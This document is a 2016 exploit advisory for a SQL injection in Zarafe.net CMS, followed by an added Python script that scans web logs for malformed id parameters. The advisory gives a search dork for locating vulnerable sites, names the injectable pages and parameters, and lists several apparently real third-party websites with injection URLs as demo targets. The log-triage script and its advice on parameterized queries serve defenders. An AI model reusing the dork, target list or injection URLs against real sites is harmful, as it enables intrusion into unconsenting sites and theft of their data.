`Exploit Title : Zarafe.net CMS SQL Injection Vulnerability
Exploit Author : Iran Cyber Security Group (ICSG)
Discovered By : 0x3a
Vendor HomePage : www.zarrafe.net
Version : 1.0 (Q1)
Date : 4 April, 2016
Tested On : Internet Explorer , Win 98
-----------------------------------------
SQL Injection :
To find a target, first search for the dork and select your target.
Dork : intext:"طراحی و پیاده سازی توسط زرافه دات نت"
Vulnerable Page : news.php , news_view.php , product.php
Vulnerable Variable : news_id=
Demo :
novinsystemfars.ir/news_view.php?news_id=30'
pezeshkian-pharmacy.ir/news.php?news_id=3'
sdshiraz.com/news.php?news_id=8'
omidoor.com/products.php?product_category_code=12-15'
meysam71.ir/news.php?khabar_id=10'
etehadweb.ir/view_single_news.php?news_id=2
[+][+][+][+][+][+][+]
WWW.IRAN-CYBER.NET[+]
[+][+][+][+][+][+][+]
</0x3a>
`
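Added example for defenders, not part of the original advisory: a log triage pass that flags requests to the scripts and id parameters named above when the value is not a plain id. It assumes Apache/nginx combined-format access logs and that legitimate ids are digits, optionally hyphen-separated; the log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts listed in the advisory, plus the script names seen in its demo URLs.
SCRIPT_RE = re.compile(r"/(news|news_view|view_single_news|products?)\.php$")
# Parameter named in the advisory, plus the two others seen in its demo URLs.
ID_PARAMS = {"news_id", "khabar_id", "product_category_code"}
# Assumption: a legitimate id is digits, optionally hyphen-separated ("12-15").
VALID_ID = re.compile(r"\d+(-\d+)*")
# Client address and request target from a combined-format log entry.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Return (client, path, param, value) for id parameters that are not plain ids."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        client, target = m.groups()
        url = urlsplit(target)
        if not SCRIPT_RE.search(url.path):
            continue  # script not covered by the advisory
        # parse_qsl percent-decodes, so %27 and a literal ' are treated alike.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in ID_PARAMS and not VALID_ID.fullmatch(value):
                hits.append((client, url.path, name, value))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Apr/2016:10:01:02 +0000] "GET /news.php?news_id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Apr/2016:10:01:05 +0000] "GET /news_view.php?news_id=30%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [04/Apr/2016:10:02:11 +0000] "GET /products.php?product_category_code=12-15 HTTP/1.1" 200 8001 "-" "Mozilla/5.0"',
    "198.51.100.4 - - [04/Apr/2016:10:02:15 +0000] \"GET /products.php?product_category_code=12-15' HTTP/1.1\" 200 97 \"-\" \"Mozilla/5.0\"",
    '192.0.2.50 - - [04/Apr/2016:10:03:00 +0000] "GET /contact.php?news_id=1%27 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit only shows that a malformed id reached the script; the fix on the application side is to validate the id and pass it to the database through a parameterized query.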